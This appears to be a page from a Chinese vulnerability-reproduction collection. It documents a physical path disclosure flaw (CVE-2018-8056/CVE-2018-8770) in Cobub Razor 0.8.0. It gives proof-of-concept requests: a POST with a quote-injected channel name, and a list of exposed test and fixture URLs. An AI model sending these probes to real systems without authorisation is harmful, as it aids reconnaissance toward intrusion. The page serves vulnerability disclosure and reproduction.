menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 026-Cobub Razor chevron_right 003-CVE-2018-8056_CVE-2018-8770 Cobub Razor 0.8.0 存在物理路径泄露漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    003-CVE-2018-8056_CVE-2018-8770 Cobub Razor 0.8.0 存在物理路径泄露漏洞.md
    1.16 KB / 2021-07-17 00:01:20
        # CVE-2018-8056/CVE-2018-8770 Cobub Razor 0.8.0 存在物理路径泄露漏洞
    
    ## 漏洞影响
    
    Cobub Razor 0.8.0
    
    ## 复现过程
    
    **POC**
    
    **方法一:**
    
    
    ```
    URL: http://localhost/export.php
    HTTP Method: GET
    URL: http://localhost/index.php?/manage/channel/addchannel
    HTTP Method: POST
    Data: channel_name=test"&platform=1
    ```
    
    **方法二:**
    
    Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。
    
    
    ```bash
    HTTP Method: GET
    http://localhost/tests/generate.php
    http://localhost/tests/controllers/getConfigTest.php
    http://localhost/tests/controllers/getUpdateTest.php
    http://localhost/tests/controllers/postclientdataTest.php
    http://localhost/tests/controllers/posterrorTest.php
    http://localhost/tests/controllers/posteventTest.php
    http://localhost/tests/controllers/posttagTest.php
    http://localhost/tests/controllers/postusinglogTest.php
    http://localhost/tests/fixtures/Controller_fixt.php
    http://localhost/tests/fixtures/Controller_fixt2.php
    http://localhost/tests/fixtures/view_fixt2.php
    http://localhost/tests/libs/ipTest.php
    http://localhost/tests/models/commonDbfix.php
    ```
    
    links
    file_download